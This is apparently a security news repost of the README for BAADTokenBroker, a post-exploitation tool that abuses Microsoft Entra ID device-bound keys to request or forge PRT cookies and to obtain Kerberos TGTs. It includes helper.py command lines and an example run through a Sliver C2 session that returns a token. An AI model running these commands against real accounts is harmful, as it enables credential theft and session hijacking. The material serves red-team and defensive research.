BAADTokenBroker Abuses Microsoft Entra ID Device-Bound Keys for PRT Hijacking
BAADTokenBroker
BAADTokenBroker is a post-exploitation tool designed to interact with Microsoft Entra ID device-bound keys.
It can:
- Request the logged-on user’s PRT cookie
- Create a PRT cookie using supplied credentials
- Acquire a TGT and NT hash by abusing Entra Kerberos mechanisms
Usage
BAADTokenBroker provides the following commands:
info: Retrieve Entra ID informationget_token_blob: Dump cached token (this is mainly research purpose and not easy to be used in engagements)sign_with_dkpriv: Sign provided data using Entra device keysign_with_popkey: Sign provided data using POP keydecrypt_with_popkey: Decrypt provided data using POP keysign_with_userkey: Sign provided data using Windows Hello for Business keyrequest_prt_cookie: Request a PRT Cookierequest_sso_tgs: Request a service ticket for Desktop SSO, which you can use it with your favorite tools like SeamlessPass.
However, to use the commands easily for common scenarios, helper.py generates BAADTokenBroker’s command lines based on what you want to achieve.
Run helper.py with one of the following options:
-
request_prt_cookie- Generates command lines to request the logged-on user’s PRT cookie
-
create_prt_cookie- Generates command lines to create a PRT cookie using supplied credentials
-
get_tgt- Generates command lines to request a partial TGT and session key via a PRT Cookie
- patched by Microsoft around April 4th, 2026
- Generates command lines to request a partial TGT and session key via a PRT Cookie
-
get_tgt_with_whfb- Generates command lines to request a partial TGT and session key via Windows Hello for Business
-
get_tgt_with_sso_tgs- Generates command lines to request a partial TGT and session key via Desktop SSO Kerberos Ticket
Here is the example when retrieving a user’s PRT Cookie. When you want to generate command lines for sliver, -s option is required.
[pastacode lang=”bash” manual=”%24%20python3%20helper.py%20-s%20request_prt_cookie%0A%5B*%5D%20execute%20BAADTokenBroker%20as%20follows%3A%0ABAADTokenBroker%20–%20–command%20request_prt_cookie%20–arg1%20AwABEgEAAAADAOz_BQD0_0V2b1N0c0FydGlmYWN0cwUAAAAAAKXQM761QXLG8dCrW3ByGQITDdFPqQ_iURV8oT0AS3tyjjioOmsPBmN25hbVJT1ikAxhhPVFOmQUyItDYvZh99YgAA” message=”” highlight=”” provider=”manual”/]
Execute the command lines like the following
[pastacode lang=”markup” manual=”%5Blocalhost%5D%20sliver%20(_)%20%3E%20BAADTokenBroker%20–%20–command%20request_prt_cookie%20–arg1%20AwABEgEAAAADAOz_BQD0_0V2b1N0c0FydGlmYWN0cwUAAAAAAKXQM761QXLG8dCrW3ByGQITDdFPqQ_iURV8oT0AS3tyjjioOmsPBmN25hbVJT1ikAxhhPVFOmQUyItDYvZh99YgAA%0A%0A%20%20-arg2%3A%3Cempty%3E%20(default)%0A%20%20-arg3%3A%3Cempty%3E%20(default)%0A%20%20-arg4%3A%3Cempty%3E%20(default)%0A%5B*%5D%20Successfully%20executed%20BAADTokenBroker%20(coff-loader)%0A%5B*%5D%20Got%20output%3A%0A%5B*%5D%20requesting%20PRT%20Cookie…%0A%5B%2B%5D%20request_prt_cookie%20success!%0A%0AeyJhbGciOiJIUzI1NiIsICJrZGZfd…(omitted)” message=”” highlight=”” provider=”manual”/]
Install
Support Our Threat Intelligence
If you find our technology report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
